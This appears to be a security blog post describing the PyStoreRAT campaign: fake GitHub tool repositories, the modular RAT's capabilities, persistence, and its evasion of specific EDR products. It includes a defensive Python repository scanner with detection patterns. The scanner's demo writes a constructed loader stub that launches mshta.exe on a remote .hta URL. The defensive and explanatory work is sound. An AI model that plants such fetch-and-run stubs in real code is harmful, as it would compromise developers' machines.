PyStoreRAT Malware Spreading Across GitHub
- Dec 12, 2025
Key Findings
- A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
- The malicious repositories, often themed as development utilities or OSINT tools, contain code responsible for silently downloading and executing a remote HTA file.
- PyStoreRAT is a modular, multi-stage implant that can execute various payloads, including an information stealer known as Rhadamanthys.
- The threat actors behind the campaign leverage either newly created GitHub accounts or dormant ones to publish the repositories, stealthily slipping the malicious payload in the form of "maintenance" commits.
- The malware is designed for stealth and flexibility, adapting its launch method to evade specific security products and spreading through removable drives.
Background
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via mshta.exe.
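A defender-side check for the loader pattern described above, added here as an example rather than code from either source: it walks a cloned repository and flags Python files that reference mshta.exe, an .hta URL, or a remote fetch paired with a process launch. The pattern set, the two-file sample repository and the example.invalid URL are constructed for this demo.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators for the few-line loader stub the report describes. These
# patterns are constructed for this example, not signatures from the research.
PATTERNS = {
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE),
    "hta_url": re.compile(r"https?://[^\s\"']+\.hta\b", re.IGNORECASE),
    "fetch": re.compile(r"\b(?:urlopen|urlretrieve|requests\.get)\b"),
    "exec": re.compile(r"\b(?:subprocess\.(?:run|Popen|call)|os\.(?:system|popen|startfile))\b"),
}

def scan_file(path: Path) -> list[str]:
    """Return the names of every indicator pattern that matches one file."""
    text = path.read_text(encoding="utf-8", errors="ignore")
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def severity(hits: list[str]) -> str:
    """mshta or an .hta URL is high on its own; fetch plus exec is medium."""
    if "mshta" in hits or "hta_url" in hits:
        return "high"
    if "fetch" in hits and "exec" in hits:
        return "medium"
    return "none"

def scan_repo(root: Path) -> dict[str, tuple[str, list[str]]]:
    """Walk a checked-out repository and report the files worth a closer look."""
    findings = {}
    for path in sorted(root.rglob("*.py")):
        hits = scan_file(path)
        level = severity(hits)
        if level != "none":
            findings[path.relative_to(root).as_posix()] = (level, hits)
    return findings

def build_sample_repo() -> Path:
    """Write a constructed two-file repository to a temp dir for the demo."""
    root = Path(tempfile.mkdtemp(prefix="repo-scan-demo-"))
    (root / "osint_tool.py").write_text("import argparse\n\ndef main():\n    print('lookup')\n")
    (root / "utils").mkdir()
    # Constructed stand-in for the stub the report describes; example.invalid never resolves.
    (root / "utils" / "helper.py").write_text("import subprocess\nu = 'https://example.invalid/update.hta'\n"
                                              "subprocess.run(['mshta.exe', u], check=False)\n")
    return root

if __name__ == "__main__":
    for name, (level, hits) in scan_repo(build_sample_repo()).items():
        print(f"{level:6} {name}: {', '.join(hits)}")
```

Run it against a real clone by calling scan_repo(Path("path/to/repo")); a "high" hit on a utility-themed repository is the point at which to pull the commit history and look for the "maintenance" commit that introduced it.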
Malware Capabilities
PyStoreRAT has been described as a "modular, multi-stage" implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload. It can profile the system, check for administrator privileges, and scan for cryptocurrency wallet-related files.
Delivery and Persistence
The attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. The threat actors leverage either newly created GitHub accounts or ones that had lain dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of "maintenance" commits.
Persistence is achieved by setting up a scheduled task that's disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host.
Evasion and Spreading
The malware is designed for stealth and flexibility, adapting its launch method to evade specific security products such as CrowdStrike Falcon and products from Cybereason and ReasonLabs. It can also spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files.
Attribution
The presence of Russian-language artifacts and coding patterns in the malware suggests that the threat actors behind the operation are likely of Eastern European origin. However, the identity of the group remains unknown.
Conclusion
PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.
Sources
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://hackread.com/pystorerat-rat-malware-github-osint-researchers/